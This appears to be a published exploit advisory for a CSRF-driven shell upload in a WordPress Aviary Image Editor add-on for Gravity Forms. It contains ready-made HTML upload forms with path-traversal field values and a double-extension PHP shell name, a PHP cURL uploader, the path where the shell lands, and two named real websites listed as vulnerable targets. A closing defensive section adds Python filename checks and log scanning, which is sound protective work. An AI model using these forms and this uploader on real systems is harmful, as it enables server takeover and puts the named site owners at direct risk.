WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability

2020.03.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

####################################################################
# Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/03/2020
# Vendor Homepage : wordpress.org
# Software Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/
# Software Affected Version : 3.0 (Beta r7) and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
#                      CWE-264 [ Permissions, Privileges, and Access Controls ]
#                      CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################

# Impact :
***********
The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress is prone to an arbitrary-file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable; other versions may also be affected.

CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, it may be possible for an attacker to trick a client into making an unintentional request to the web server, which will then be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************

CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************

<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************

<html>
<head><title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title></head>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>

# CSRF Cross Site Request Forgery Exploit 3 =>
****************************************

<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

PHP Exploiter Code :
*********************

<?php
$uploadfile = "kingskrupellos.php.pjpg"; // KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the legacy "@file" prefix, which PHP 5.6+ no longer treats as a file upload by default
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Vulnerability Error :
********************

{"status":"error","message":"Unsupported File Type. Supported files","code":null}
{"status":"error","message":"Unsupported File Type. Supported files"}

Directory File Path :
******************

/wp-content/uploads/gform_aviary/_[SHELL].php.pjpg

####################################################################

# Example Vulnerable Sites :
************************

[+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
[+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php

####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
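Defender-side checks for the two weaknesses the advisory shows (a double-extension name such as kingskrupellos.php.pjpg, and traversal values in form_id / gform_unique_id), plus a pass over access-log lines for POSTs to the plugin's upload.php and for fetches of non-image files from the gform_aviary upload directory. This is an added example, not code from the plugin or from the advisory author; it assumes combined-log-format lines and an image allow-list of jpg/jpeg/png/gif, and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Endpoint and upload directory named in the advisory.
UPLOAD_ENDPOINT = "/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
UPLOAD_DIR = "/wp-content/uploads/gform_aviary/"

# Extensions a web server may hand to an interpreter: if one appears in ANY dotted
# segment the name is refused, so "shell.php.pjpg" fails even though it ends in .pjpg.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}  # allow-list (assumption for this example)

def filename_is_safe(name: str) -> bool:
    """Reject path separators, NULs, dotfiles, script extensions anywhere, and non-image endings."""
    name = unquote(name)
    if any(c in name for c in "/\\\x00") or name.startswith("."):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or any(p in SCRIPT_EXTS for p in parts[1:]):
        return False
    return parts[-1] in IMAGE_EXTS

def path_param_is_safe(value: str) -> bool:
    """form_id / gform_unique_id end up as directory components in the forms above;
    limiting them to a short token rules out '../../../' and its URL-encoded forms."""
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", unquote(value)) is not None

# Apache/nginx combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def find_suspicious(log_lines):
    """Return (ip, status, reason) for POSTs to upload.php and for requests that fetch a
    non-image file out of the plugin's upload directory (a dropped file being called)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m["path"]).split("?", 1)[0]
        name = path.rsplit("/", 1)[1]
        if m["method"] == "POST" and path.lower().endswith(UPLOAD_ENDPOINT):
            hits.append((m["ip"], m["status"], "post-to-upload-endpoint"))
        elif path.startswith(UPLOAD_DIR) and name and not filename_is_safe(name):
            hits.append((m["ip"], m["status"], "non-image-in-upload-dir"))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [23/Mar/2020:10:01:02 +0000] "POST /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php HTTP/1.1" 200 71 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Mar/2020:10:01:05 +0000] "GET /wp-content/uploads/gform_aviary/_x.php.pjpg HTTP/1.1" 200 33 "-" "curl/7.64.0"',
    '192.0.2.9 - - [23/Mar/2020:10:02:00 +0000] "GET /wp-content/uploads/gform_aviary/photo.2020.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```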


Copyright 2024, cxsecurity.com
